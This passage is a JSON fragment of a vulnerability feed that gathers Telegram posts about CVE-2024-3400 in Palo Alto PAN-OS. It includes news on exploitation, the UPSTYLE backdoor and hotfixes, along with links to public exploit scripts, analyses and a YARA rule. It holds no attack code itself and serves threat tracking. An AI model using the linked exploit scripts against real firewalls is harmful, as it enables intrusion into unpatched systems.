"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/information_security_channel/52052", "content": "Palo Alto Networks Shares Remediation Advice for Hacked Firewalls\nhttps://www.securityweek.com/palo-alto-networks-shares-remediation-advice-for-hacked-firewalls/\n\nPalo Alto Networks has shared remediation instructions for organizations whose firewalls have been hacked via CVE-2024-3400.\nThe post Palo Alto Networks Shares Remediation Advice for Hacked Firewalls (https://www.securityweek.com/palo-alto-networks-shares-remediation-advice-for-hacked-firewalls/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-04-25T18:53:59.000000Z"}, {"uuid": "28fa2a75-a268-4930-b41a-2815fc2752e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/thehackernews/4815", "content": "Hackers exploited a critical flaw (CVE-2024-3400) in Palo Alto Networks' software weeks before it was discovered. \n\nThey used a Python backdoor, UPSTYLE, to control and conceal commands within firewall files.\n\nRead: https://thehackernews.com/2024/04/hackers-deploy-python-backdoor-in-palo.html", "creation_timestamp": "2024-04-13T10:41:52.000000Z"}, {"uuid": "ca4475bc-42cc-4478-a9bd-cb1f6ef071ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/thehackernews/4818", "content": "Palo Alto Networks released critical hotfixes to patch a severe vulnerability (CVE-2024-3400) in their PAN-OS firewall software. \n \nThe vulnerability allows unauthenticated attackers to run malicious code with root privileges. \n \nhttps://thehackernews.com/2024/04/palo-alto-networks-releases-urgent.html", "creation_timestamp": "2024-04-15T10:45:02.000000Z"}, {"uuid": "a116c954-e881-40b8-ae01-5c5ca301bd61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/thehackernews/4880", "content": "\ud83c\udd98 Attention, Palo Alto Networks users! \n \nA critical vulnerability (CVE-2024-3400) in PAN-OS could expose your systems to remote code execution attacks. \n \nGood news: Hotfixes and remediation steps available. \n \nRead full advisory: https://thehackernews.com/2024/04/palo-alto-networks-outlines-remediation.html", "creation_timestamp": "2024-04-26T12:48:10.000000Z"}, {"uuid": "d303000c-4207-4c37-ae11-7232913c3695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/information_security_channel/51962", "content": "Palo Alto Networks Releases Fixes for Firewall Zero-Day as Attribution Attempts Emerge\nhttps://www.securityweek.com/palo-alto-networks-releases-fixes-for-firewall-zero-day-as-first-attribution-attempts-emerge/\n\nPalo Alto Networks has started releasing hotfixes for the firewall zero-day CVE-2024-3400, which some have linked to North Korea\u2019s Lazarus.\u00a0\nThe post Palo Alto Networks Releases Fixes for Firewall Zero-Day as Attribution Attempts Emerge (https://www.securityweek.com/palo-alto-networks-releases-fixes-for-firewall-zero-day-as-first-attribution-attempts-emerge/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-04-15T13:47:13.000000Z"}, {"uuid": "7e35b918-e3f4-4e5a-988a-6b3ef0e31f7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/information_security_channel/51984", "content": "Exploitation of Palo Alto Firewall Vulnerability Picking Up After PoC Release\nhttps://www.securityweek.com/exploitation-of-palo-alto-firewall-vulnerability-picking-up-after-poc-release/\n\nPalo Alto Networks firewall vulnerability CVE-2024-3400 increasingly exploited after PoC code has been released.\u00a0\nThe post Exploitation of Palo Alto Firewall Vulnerability Picking Up After PoC Release (https://www.securityweek.com/exploitation-of-palo-alto-firewall-vulnerability-picking-up-after-poc-release/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-04-17T14:03:40.000000Z"}, {"uuid": "68726c33-32fb-444a-a834-b10bcfa24fe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/thehackernews/5039", "content": "\ud83d\udea8 RedTail cryptocurrency mining malware now exploits a critical Palo Alto Networks firewall flaw (CVE-2024-3400) with a CVSS score of 10.0, making it more dangerous than ever. \n \nLearn more: https://thehackernews.com/2024/05/redtail-crypto-mining-malware.html \n \nEnsure your firewalls are patched and secure!", "creation_timestamp": "2024-05-30T16:42:38.000000Z"}, {"uuid": "ee2e07c5-1f50-4dd2-8405-cad9d4ed38ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/xakep_ru/15702", "content": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0441\u0432\u0435\u0436\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 PAN-OS Palo Alto Networks\n\n\u0412 \u0441\u0435\u0442\u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-3400, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u044b Palo Alto Networks \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c PAN-OS. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0430\u043c\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 root-\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\nhttps://xakep.ru/2024/04/17/cve-2024-3400-exploit/", "creation_timestamp": "2024-04-17T20:41:23.000000Z"}, {"uuid": "d88f119b-3ff4-4569-accc-fd64c7632e74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/xakep_ru/15688", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430\u0445 Palo Alto Networks \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0430\u0441\u044c \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0441 \u043c\u0430\u0440\u0442\u0430\n\n\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0431\u043e\u043b\u0435\u0435 \u0434\u0432\u0443\u0445 \u043d\u0435\u0434\u0435\u043b\u044c \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430\u0445 Palo Alto Networks, \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Volexity. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-3400 (10 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS) \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0443\u044e \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 root-\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\nhttps://xakep.ru/2024/04/15/operation-midnighteclipse/", "creation_timestamp": "2024-04-15T14:34:10.000000Z"}, {"uuid": "2c2dea1f-7207-4362-8dcf-f471bb856bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2303", "content": "https://github.com/DrewskyDev/CVE-2024-3400\n\ncve-2024-3400\n#github #exploit", "creation_timestamp": "2024-04-14T14:42:12.000000Z"}, {"uuid": "e3f60d07-14fa-4609-a74e-21b7f8e217be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8577", "content": "Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)\n\nhttps://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/", "creation_timestamp": "2024-04-30T18:21:20.000000Z"}, {"uuid": "01623140-8027-4335-83ce-cd7c9afbca97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8630", "content": "Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)\n\nhttps://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/", "creation_timestamp": "2024-04-30T18:21:23.000000Z"}, {"uuid": "d3760551-b44e-4df5-bac3-f21e2dfdfe46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2342", "content": "https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n\ncve-2024-3400\n#\u5206\u6790 #poc", "creation_timestamp": "2024-04-18T12:25:19.000000Z"}, {"uuid": "ccf7f616-841b-45d9-a4bb-a89414c71870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/6500", "content": "UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages \ud83d\udd25 \n\nGithub \n\n#poc #backdoor #0day\n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-04-13T15:05:38.000000Z"}, {"uuid": "fc1fe701-2765-474b-a223-cacd457c2132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10325", "content": "#exploit\nCVE-2024-3400:\nPAN-OS Firewall Command Injection Exploit Script\n]-&gt; https://github.com/W01fh4cker/CVE-2024-3400-RCE", "creation_timestamp": "2024-04-17T13:52:56.000000Z"}, {"uuid": "10b63540-079b-4ac7-bb34-556029a2da4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/CybNux/6176", "content": "\u0627\u0633\u062a\u063a\u0644\u0627\u0644 Zero-Day \u0644\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\u0627 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u0639\u062f \u0641\u064a GlobalProtect (CVE-2024-3400)", "creation_timestamp": "2024-04-15T09:35:52.000000Z"}, {"uuid": "580f7b8f-83a2-4ed5-9948-833ebb1ce47f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/SumatraSelatanCyberTeamIndonesia/507", "content": "CVE-2024-3400: PAN-OS Firewall Exploit Script\n1. https://github.com/0x0d3ad/CVE-2024-3400\n2. https://github.com/h4x0r-dz/CVE-2024-3400\n3. https://github.com/AdaniKamal/CVE-2024-3400\n4. https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400", "creation_timestamp": "2024-06-28T09:29:54.000000Z"}, {"uuid": "80b12ce0-b597-42b6-a006-05f256a9c8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/club31337/1847", "content": "Unauthenticated RCE in Palo Alto Networks GlobalProtect\n\nhttps://security.paloaltonetworks.com/CVE-2024-3400\n\n\u269c\ufe0f @club1337", "creation_timestamp": "2024-11-11T01:56:45.000000Z"}, {"uuid": "4b5f703a-3e67-4f19-b5be-c6e49a0effa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/club31337/1866", "content": "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n\nhttps://github.com/RustyNoob-619/YARA/blob/main/Rules/Python_UPSTYLE_Backdoor.yara\n\n\u269c\ufe0f @club1337", "creation_timestamp": "2024-11-11T01:56:52.000000Z"}]}